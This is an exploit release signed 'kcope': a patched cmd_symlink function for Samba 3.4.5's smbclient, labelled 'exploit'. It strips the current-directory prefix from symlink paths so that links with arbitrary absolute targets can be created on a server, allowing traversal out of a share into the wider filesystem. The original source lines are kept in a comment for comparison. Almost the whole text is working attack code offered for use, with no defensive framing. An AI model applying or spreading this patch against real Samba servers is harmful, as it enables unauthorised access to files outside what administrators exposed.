smbclient patch (exploit):
samba-3.4.5/source3/client/client.c
/****************************************************************************
UNIX symlink.
****************************************************************************/
static int cmd_symlink(void)
{
TALLOC_CTX *ctx = talloc_tos();
char *oldname = NULL;
char *newname = NULL;
char *buf = NULL;
char *buf2 = NULL;
char *targetname = NULL;
struct cli_state *targetcli;
if (!next_token_talloc(ctx, &cmd_ptr,&buf,NULL) ||
!next_token_talloc(ctx, &cmd_ptr,&buf2,NULL)) {
d_printf("symlink <oldname> <newname>\n");
return 1;
}
oldname = talloc_asprintf(ctx,
"%s", // << HERE modified
buf);
if (!oldname) {
return 1;
}
newname = talloc_asprintf(ctx,
"%s", // << HERE modified
buf2);
if (!newname) {
return 1;
}
/* ORIGINAL SMBCLIENT SOURCE LINES TO BE MODIFIED (SEE ABOVE).
oldname = talloc_asprintf(ctx,
"%s%s", // < modified (see above)
client_get_cur_dir(), // < removed (see above)
buf);
if (!oldname) {
return 1;
}
newname = talloc_asprintf(ctx,
"%s%s", // < modified (see above)
client_get_cur_dir(), // < removed (see above)
buf2);
if (!newname) {
return 1;
}
----------------------------------------------*/
if (!cli_resolve_path(ctx, "", auth_info, cli, oldname, &targetcli, &targetname)) {
d_printf("link %s: %s\n", oldname, cli_errstr(cli));
return 1;
}
if (!SERVER_HAS_UNIX_CIFS(targetcli)) {
d_printf("Server doesn't support UNIX CIFS calls.\n");
return 1;
}
if (!cli_unix_symlink(targetcli, targetname, newname)) {
d_printf("%s symlinking files (%s -> %s)\n",
cli_errstr(targetcli), newname, targetname);
return 1;
}
return 0;
}
// Cheers,
// kcope